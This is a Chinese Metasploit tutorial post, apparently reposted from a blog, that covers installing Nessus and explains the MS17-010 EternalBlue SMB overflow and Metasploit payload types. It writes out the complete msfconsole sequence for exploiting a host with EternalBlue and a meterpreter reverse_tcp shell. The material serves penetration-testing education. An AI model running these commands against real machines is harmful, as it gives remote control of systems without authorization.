Metasploit 进阶第三讲

深入理解攻击载荷

 

01 Nesus介绍、安装及使用

Nessus介绍

Nessus是一款著名的漏洞扫描及分析工具,提供完整的漏洞扫描服务,并随时更新漏洞数据库。

采用B/S模式,服务器端负责执行具体的扫描任务,客户端负责管理配置服务器端,在服务器端还采用plug-in体系,支持客户端加入自定义插件,其运作效能随系统资源而自行调整。

Nessus安装&使用

1.https://www.tenable.com/downloads/nessus              ->Nessus下载、获取激活码

2.dpkg  -I  Nessus-8.3.1-debian6_amd64/i386.deb             ->Nessus安装

3./etc/init.d/nessusd start             ->Nessus服务器端启动

Register for an Activation Co

4.https://127.0.0.1:8834/                 ->客户端访问(添加例外)获取激活码:

https://www.tenable.com/products/nessus-home

实操:利用ms2017-010攻击目标主机

ms17-010漏洞出现在Windows SMBv1中的内核态函数srv4SrvOs2FeaListToNt。

在将FEA list转换成NTFEA(Windows NT FEA)list前会调用srv.SrvOs2FeaListSizeToNt去计算转换后的FEAlist的大小,因计算大小错误,而导致缓冲区溢出。

Msfconsole

Search  ms17-010

use exploit/windows/smb/ms17_010_eternalblue

set        rhosts   192.168.24.142

show    payloads

set        payload  windows/x64/meterpreter/reverse_tcp

set  lhost  192.168.24.137

run

深入理解payload

payload是什么?

payload字面意思是有效攻击载荷,包含需要在远程主机上运行的恶意代码。

payload和exploit的区别?

exploit是传送系统(运载火箭),payload是用来实际做什么事的代码(弹头)

payload命名规则:

Staged payload:<platform>/[archl/stage>/<stager>

Single payload:<platform>/[arch]/ssingle>

其中arch可选,因为不必要或已默认,如:php/meterpreter/reverse_tcp

payload的分类:

single、stager、stage三种。其中:

single:是一种完全独立的Payload。如:meterpreter_reverse_tcp

stager:负责建立目标用户与攻击者之间的网络连接,将执行传递到另一个阶段。

如:reverse_tcp、bind_tcp

作用:

1.允许我们使用较小的有效载荷去加载具有更多功能的较大的payload。

2.使通信机制与最终阶段分离成为可能。

stage:提供更高级的功能,且没有大小限制(因为stager为stage分配了大量内存)

如:meterpreter

stager和stage就像web入侵里面提到的小马和大马一样,由于exploit环境的限制,可能不能一下子把stage传过去,需要先传一个stager,stager在attacker和target之间建立网络连接,之后再把stage传过去进行下一步的行动。

转载于:https://www.cnblogs.com/lvwuwa/p/11128964.html

5.Metasploit攻击载荷深入理解相关推荐

  1. 使用Metasploit生成攻击载荷——msfvenom免杀、upx加壳

    文章目录 前言 一.免杀 1.msfvenom的使用 2.多重编码 二.加壳 1.upx的使用 总结 前言 本文详细介绍了使用Metasploit创建攻击载荷(使用攻击载荷生成器msfvenom),以 ...

  2. MetaSploit攻击实例讲解------社会工程学set攻击(kali linux 2016.2(rolling))(详细)

    来源:https://www.cnblogs.com/zlslch/p/6888540.html 不多说,直接上干货! 首先,如果你是用的BT5,则set的配置文件是在 /pentest/exploi ...

  3. kali初讲——Metasploit攻击ms17_010复现

    Metasploit攻击--ms17_010漏洞利用 文章目录 Metasploit攻击--ms17_010漏洞利用 导论 一.ms17_010简介 二.攻击使用模块 三..攻击思路 四.具体实施 总 ...

  4. Kali渗透测试:使用工具Metasploit攻击操作系统

    Kali渗透测试:使用工具Metasploit攻击操作系统 如果在目标系统上发现了漏洞之后,接下来就是要利用漏洞渗透工具对目标系统进行攻击.Metasploit是目前非常优秀的一款漏洞渗透工具. 1. ...

  5. Metasploit攻击win7实例(上)

    一.实验目的 通过该实验熟悉Nessus漏洞扫描工具的安装和主机漏洞扫描的方法,学会利用Nessus扫描结果筛选合适的Metasploit攻击模块进行安全测试.攻击. 二.实验环境 图1 实验拓扑图 ...

  6. Metasploit攻击linux实例

    一.实验目的 通过该实验了解Metasploit的基本框架,掌握metasploit攻击操作系统的一般方法 二.实验环境 漏洞主机:linux, IP 地址:10.1.1.136 攻击主机:Kali ...

  7. Metasploit攻击Oracle的环境搭建

    Metasploit中关于Oracle的攻击模块默认并不完全,需要自己做一些工作.本文主要记录在搭建环境的中的一些错误(操作系统Backtrack 5).在默认情况下使用oracle的一些攻击功能会出 ...

  8. Kali渗透测试——利用metasploit攻击靶机WinXP SP1

    搭建渗透测试环境 Kali攻击机 WinXP SP1 靶机 启动metasploit 跟windows RPC相关的漏洞 内部提供的漏洞攻击 靶机winxp sp1网络配置 查看虚拟机的NAT网段 配 ...

  9. MetaSploit攻击实例讲解------Metasploit自动化攻击(包括kali linux 2016.2(rolling) 和 BT5)...

    不多说,直接上干货! 前期博客 Kali linux 2016.2(Rolling)里Metasploit连接(包括默认和自定义)的PostgreSQL数据库 Kali linux 2016.2(Ro ...

最新文章

  1. tf.nn.embedding_lookup()的用法
  2. svpwm矢量控制电机相电压波形_如何深入理解SVPWM?
  3. 最少预算覆盖最多应用,高性价比小企业服务器服务器榜单
  4. Linux shell去除字符串中所有空格
  5. Linux中高斯分布的参数设置,华为openGauss 配置操作系统参数
  6. java中使用grpc和protobuf
  7. 物联网框架ServerSuperIO在.NetCore实现跨平台的实践路线
  8. LeetCode 206. 反转链表
  9. 同样是创业,同样是两年,有的已经做了几千万,这边已经内斗死了
  10. 【财务预警】基于matlab BP神经网络财务预警【含Matlab源码 494期】
  11. VIN码识别技术,扫一扫自动获取车架号
  12. 刀图案c语言,刀符号图案大全 | 手游网游页游攻略大全
  13. 网络篇 - netty实现高并发安全聊天客户端
  14. 【矩阵论】单射、满射与双射
  15. 彩信发送失败原因是什么?如何解决?
  16. win10 SystemParametersInfo 设置屏保 不好使_[教程]win10 ,ubuntu双系统安装避坑指南
  17. 《ERP高级计划》书解读-APS案例分析之四缓冲的计算(蔡颖)(转)
  18. 第9章第24节:制作商业计划书的盈利模式幻灯片 [PowerPoint精美幻灯片实战教程]
  19. (十六)从零开始学人工智能-深度学习基础3
  20. 程序员课外拓展007:强烈推荐一个自学网:可汗学院

热门文章

  1. Zed Shaw:一位老程序员的建议
  2. “笨办法”学Python3,Zed A. Shaw, 习题3
  3. http://blossomsandaccents.com/mk.html 57568
  4. 美设计出激光动力太空电梯 成功爬升900米
  5. 打脸质疑者!Mobileye市值冲高,公司CEO说出心声
  6. 美式英语和英式英语不同发音总结
  7. 【Proteus仿真】步进电机转速数码管显示
  8. VMware启动报错Attempting to start up from:EFI VMware Virtual SCSI Hard Drive(0.0)
  9. 改后缀名不能导致图片格式的转换,以.png后缀名的图片不一定是png图片
  10. python中迭代对象是什么_python中的迭代对象和迭代器